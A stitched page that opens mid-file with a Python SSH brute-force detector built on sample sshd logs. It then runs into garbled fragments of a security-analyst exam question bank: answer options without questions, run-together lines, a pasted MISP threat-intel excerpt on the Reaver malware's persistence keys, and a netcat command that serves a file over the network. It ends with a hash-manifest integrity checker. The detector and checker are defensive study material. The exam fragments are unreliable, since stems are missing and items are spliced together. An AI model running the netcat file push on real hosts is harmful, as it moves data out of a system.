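    r"sshd\[(?P<pid>\d+)\]: error: maximum authentication attempts exceeded for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

# Constructed sample: the page's entries plus one ordinary mistyped password.
SAMPLE_LOG = """\
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Aug 6 14:20:41 demo sshd[5410]: Failed password for alice from 10.11.40.2 port 50122 ssh2
"""


def parse_ts(text):
    """Syslog timestamps carry no year; a fixed year is fine for windowing."""
    return datetime.strptime(text, "%b %d %H:%M:%S")


def failed_logins(lines):
    out = []
    for line in lines:
        m = FAIL_RE.search(line)
        if m:
            out.append({"ts": parse_ts(m["ts"]), "pid": int(m["pid"]),
                        "user": m["user"], "ip": m["ip"], "port": int(m["port"])})
    return out


def brute_force_sources(failures, threshold=5, window=timedelta(seconds=60)):
    """{(ip, user): {failures, sessions}} for sources exceeding `threshold` in any window."""
    by_src = defaultdict(list)
    for f in failures:
        by_src[(f["ip"], f["user"])].append((f["ts"], f["pid"]))
    hits = {}
    for key, events in by_src.items():
        times = sorted(ts for ts, _ in events)
        best = j = 0
        for i, t in enumerate(times):          # sliding window over sorted timestamps
            while times[j] < t - window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            # distinct sshd PIDs = separate connections: many at once means a tool, not a typo
            hits[key] = {"failures": best, "sessions": len({pid for _, pid in events})}
    return hits


def lockouts(lines):
    """(ip, user) pairs that hit MaxAuthTries and were disconnected by sshd."""
    return [(m["ip"], m["user"]) for m in map(MAX_RE.search, lines) if m]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print(brute_force_sources(failed_logins(lines)))
    print(lockouts(lines))
```

Ten failures in one second across ten different sshd PIDs is the signature of a parallel guessing tool rather than a person; the single 127.0.0.1 entry shows sshd's own MaxAuthTries cutoff, which is independent of any external blocking.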
Which of the following has not occurred?
Fail2ban has blocked the SSH login attempts.
nc -l -p 43501 < example.zip
What happened?
example.zip.
netcat as a listener to push example.zip.
example.zip.
netcat to receive example.zip.
Select source.name, destination.name, count(*) from network-events, where destination.port = '3389'
secpol.msc.
-rwxrw-r-- 1 chuck admingroup 1232 Feb 28 16:22 myfile.txt
chuck has read and write rights to the file; the Administrators group has read, write, and execute rights; and all other users only have read rights.
admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?
sha1sum to generate a hash for the file and write a script to check it periodically.
memstat from the command line
memctl from the command line
HELIX KITTEN, which notes that the group is known for creating "thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel." What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?
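Three items on this page come back to the same mechanism: the md5sum -c output ("demo.txt: FAILED"), comparing a suspect cmd.exe against a known good copy, and the option of generating a sha1sum and checking it periodically from a script. The script below is an added example, not part of the question bank: it writes a manifest in the same "<hexdigest>  <filename>" layout the coreutils *sum tools read with -c, then re-verifies after one file is altered and another removed, reporting OK / FAILED / MISSING the way md5sum -c does. The files, their contents and the temporary directory are constructed for the example; SHA-256 is used in place of MD5/SHA-1 because those are collision-broken.

```python
"""Hash-manifest integrity check, the scripted form of md5sum -c (added example)."""
import hashlib
import hmac
import tempfile
from pathlib import Path


def file_digest(path, algo="sha256", chunk_size=1 << 16):
    """Stream the file through the hash so large binaries never sit in memory whole."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def write_manifest(paths, manifest, algo="sha256"):
    """Two spaces between digest and name, as md5sum/sha1sum/sha256sum emit."""
    with open(manifest, "w", encoding="utf-8") as out:
        for p in paths:
            out.write(f"{file_digest(p, algo)}  {Path(p).name}\n")


def check_manifest(manifest, algo="sha256"):
    """Return {filename: 'OK' | 'FAILED' | 'MISSING'}, mirroring md5sum -c."""
    base = Path(manifest).parent
    results = {}
    for line in Path(manifest).read_text(encoding="utf-8").splitlines():
        if not line.strip():
            continue
        expected, name = line.split("  ", 1)
        name = name.lstrip("*")          # "*name" marks binary mode in some coreutils versions
        target = base / name
        if not target.is_file():
            results[name] = "MISSING"
            continue
        actual = file_digest(target, algo)
        results[name] = "OK" if hmac.compare_digest(actual, expected.lower()) else "FAILED"
    return results


def demo():
    """Build a baseline, tamper with it, and return (before, after) check results."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "demo.txt").write_bytes(b"original content\n")              # constructed
        (d / "cmd.exe").write_bytes(b"MZ\x90\x00 stand-in for a known-good binary")
        manifest = d / "baseline.sha256"
        write_manifest([d / "demo.txt", d / "cmd.exe"], manifest)
        before = check_manifest(manifest)
        (d / "demo.txt").write_bytes(b"tampered content\n")              # modify one file
        (d / "cmd.exe").unlink()                                         # remove the other
        after = check_manifest(manifest)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("baseline:", before)
    print("after tampering:", after)
```

The check is only as trustworthy as the manifest: store the baseline (or its signature) off the host, or an attacker who can replace cmd.exe can rewrite the hash list too. Vendor-published hashes or a package database give an independent reference when the local baseline is in doubt.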
"Unit 42 has discovered a new malware family we've named
"Reaver" with ties to attackers who use SunOrcal malware.
SunOrcal activity has been documented to at least 2013, and
based on metadata surrounding some of the C2s, may have been
active as early as 2010. The new family appears to have been in
the wild since late 2016 and to date we have only identified 10
unique samples, indicating it may be sparingly used. Reaver is
also somewhat unique in the fact that its final payload is in
the form of a Control panel item, or CPL file. To date, only
0.006% of all malware seen by Palo Alto Networks employs this
technique, indicating that it is in fact fairly rare.", "Tag":
[{"colour": "#00223b", "exportable": true, "name":
"osint:source-type="blog-post""}], "disable_correlation":
false, "object_relation": null, "type": "comment"}, {"comment":
"", "category": "Persistence mechanism", "uuid": "5a0a9d47-
1c7c-4353-8523-440b950d210f", "timestamp": "1510922426",
"to_ids": false, "value": "%COMMONPROGRAMFILES%\services\",
"disable_correlation": false, "object_relation": null, "type":
"regkey"}, {"comment": "", "category": "Persistence mechanism",
"uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp":
"1510922426", "to_ids": false, "value":
"%APPDATA%\microsoft\mmc\", "disable_correlation": false,
"object_relation": null, "type": "regkey"}, {"comment": "",
"category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-
4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids":
false, "value":
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\
Shell Folders\Common Startup"
How does the Reaver malware maintain persistence?
>Executable file was dropped: C:\Logs\mffcae1.exe
>Child process was created, parent C:\Windows\system32\cmd.exe
>mffcae1.exe connects to unusual port
>File downloaded: cx99.exe
If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?
grep command run inside of the /users directory by an administrative user. What will the command find?
grep -r "sudo" /home/users/ | grep "bash.log"
sudo command on the system
sudo command in bash log files in user home directories
sudo or bash.log in user directories
iperf
Which of these should Frank seek out to help him best protect the midsize organization he works for against unknown threats?
ifconfig command on the Linux box that he is reviewing. He sees that the device has sent less than 4 GB of data, but his network flow logs show that the system has sent more than 20 GB. What problem has Bohai encountered?
ifconfig resets traffic counters at 4 GB.
ifconfig only samples outbound traffic and will not provide accurate information.
/etc/passwd and /etc/shadow for unexpected accounts.
/home/ for new user directories.
/etc/sudoers for unexpected accounts.
/etc/groups for group membership issues.
for group membership issues.secpol.msc
on the Windows system she is reviewing, she sees the following settings. What important information will be missing from her logs?
tcpdump
on the system.tcpdump
on the SIEM device./bin
/
/etc
/dev
SERVICES.EXE
MALWARESCAN.EXE
WINLOGIN.EXE
LSASS.EXE
What is the reason these links were blocked?
nslookup
host
traceroute
sudo command to carry out operations on a Linux server. What type of access is he using?